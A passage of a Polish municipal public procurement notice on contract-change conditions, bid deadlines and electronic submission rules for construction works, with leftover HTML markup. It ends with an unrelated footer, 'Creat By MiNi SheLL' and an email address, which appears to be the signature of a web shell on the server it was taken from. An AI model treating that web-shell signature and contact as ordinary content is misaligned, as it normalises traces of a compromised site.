warunkami atmosferycznymi<br/>uniemożliwiającymi prowadzenie robót budowlanych, przeprowadzanie prób<br/>i sprawdzeń, dokonywanie odbiorów lub inne czynniki zewnętrzne i niemożliwe do<br/>przewidzenia wydarzenia które będą miały wpływ na termin realizacji umowy; b) zmianami<br/>będącymi następstwem działania organów administracji, w szczególności:– przekroczeniem<br/>zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń,<br/>uzgodnień itp.,–odmową wydania przez organy administracji wymaganych decyzji, zezwoleń,–<br/>zmianą przepisów powodujących uzyskanie dokumentów, które te przepisy narzucają<br/>lub powodujących konieczność innych rozwiązań niż zakładano w opisie przedmiotu zamówienia;<br/>c) natrafieniem przez Wykonawcę na urządzenia podziemne uprzednio niezinwentaryzowane<br/>lub niewypały, niewybuchy. wykopalisk i archeologiczne; d) klęskami żywiołowymi; e)<br/>odmiennymi<br/>od przyjętych w dokumentacji technicznej warunkami geologicznymi (kategorie gruntu,<br/>kurzawka, głazy narzutowe itp.) skutkującymi niemożliwością zrealizowania przedmiotu<br/>umowy przy dotychczasowych założeniach technologicznych; f) odmiennymi od przyjętych<br/>w dokumentacji technicznej warunkami terenowymi, w szczególności istnieniem podziemnych<br/>sieci instalacji, urządzeń, nie zinwentaryzowanych obiektów budowlanych (fundamenty.<br/>ściany szczelne itp.)skutkującymi niemożliwością zrealizowania przedmiotu umowy<br/>przy dotychczasowych założeniach technologicznych lub materiałowych; g) odmiennym, od<br/>przyjętych w dokumentacji technicznej, stanem istniejącym remontowanej / przebudowywanej<br/>konstrukcji -możliwym do stwierdzeń a dopiero po odkopaniu / odsłonięciu, a skutkującym<br/>korektami wprojekcie.2) zmian osobowych;3) materiałów. parametrów technicznych. technologii<br/>wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotu umowy;4) pozostałych<br/>zmian: a)zmiana obowiązującej stawki VAT; dopuszcza się możliwość sporządzenia aneksu do<br/>umowy uwzględniającego zmianę wartości wynagrodzenia umowy z tego tytułu; b) ....5)<br/>realizacji dodatkowych robót budowlanych nieobjętych zamówieniem podstawowym, o ile stały<br/>się niezbędne do jego wykonania ...Informacje dotyczące zakresu i rodzaju zmian umowy<br/>oraz warunki ich wprowadzenia zostały określone w §21 projektu umowy stanowiącego<br/>załącznik<br/>nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz ze wszystkimi wymaganymi oświadczeniami i dokumentami należy złożyć za pośrednictwem platformy pod adresem: https://platformazakupowa.pl/pn/gmina_swilcza</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-28 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> pod adresem: https://platformazakupowa.pl/pn/gmina_swilcza lub poczty elektronicznej,<br/>na wskazany w pkt 3 adres e-mail. Sposób sporządzenia dokumentów elektronicznych musi<br/>być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30<br/>grudnia2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z<br/>2020 poz. 2452)oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia<br/>2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz.<br/>2415);Dodatkowe informacje:1.Zamawiający zawiera umowę w sprawie zamówienia<br/>publicznego w terminie nie krótszym niż 5dni od dnia przesłania zawiadomienia o wyborze<br/>najkorzystniejszej oferty.2. Zamawiający może zawrzeć umowę w sprawie zamówienia<br/>publicznego przed upływem terminu, o którym mowa w ust. 1, jeżeli w postępowaniu o udzielenie<br/>zamówienia prowadzonym w trybie podstawowym złożono tylko jedną ofertę. 3. W przypadku<br/>wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>Zamawiający zastrzega sobie prawo żądania przed zawarciem umowy w sprawie zamówienia<br/>publicznego umowy regulującej współpracę tychWykonawców.4. Jeżeli wykonawca, którego<br/>oferta została wybrana jako najkorzystniejsza uchyla się od zawarcia umowy w sprawie<br/>zamówienia publicznego lub nie wnosi wymaganego zabezpieczenia należytego wykonania<br/>umowy, zamawiający może dokonać ponownego badania i oceny ofert spośród ofert<br/>pozostałych<br/>w postępowaniu wykonawców oraz wybrać najkorzystniejszą ofertę albo unieważnić<br/>postępowanie.

Creat By MiNi SheLL
Email: jattceo@gmail.com